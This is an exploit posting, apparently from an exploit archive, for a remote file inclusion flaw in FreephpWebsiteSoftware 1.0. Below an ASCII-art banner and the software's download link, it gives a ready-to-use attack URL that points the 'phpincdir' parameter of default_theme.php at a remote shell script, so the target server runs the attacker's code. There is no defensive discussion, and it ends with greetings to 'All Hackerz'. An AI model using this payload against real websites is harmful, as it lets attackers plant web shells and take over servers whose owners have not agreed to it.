id: 11628
date: 04/05/2010
title: FreephpWebsiteSoftware 1.0 Remote File Include Vulnerability
author: Mat
cves: 

============================================================
FreephpWebsiteSoftware 1.0 Remote File Include Vulnerability
============================================================

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
FreephpWebsiteSoftware 1.0 Remote File Include Vulnerability
Script: http://freephpblogsoftware.googlecode.com/files/freephpwebsitesoftware_1_0.rar
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)
 
//------------------------------------------------------------------+
http://[target]/[path]/default_theme.php?phpincdir=http://[shellscript]
//------------------------------------------------------------------+
 
Greetings: All Hackerz



#  0day.today [2023-03-27]  #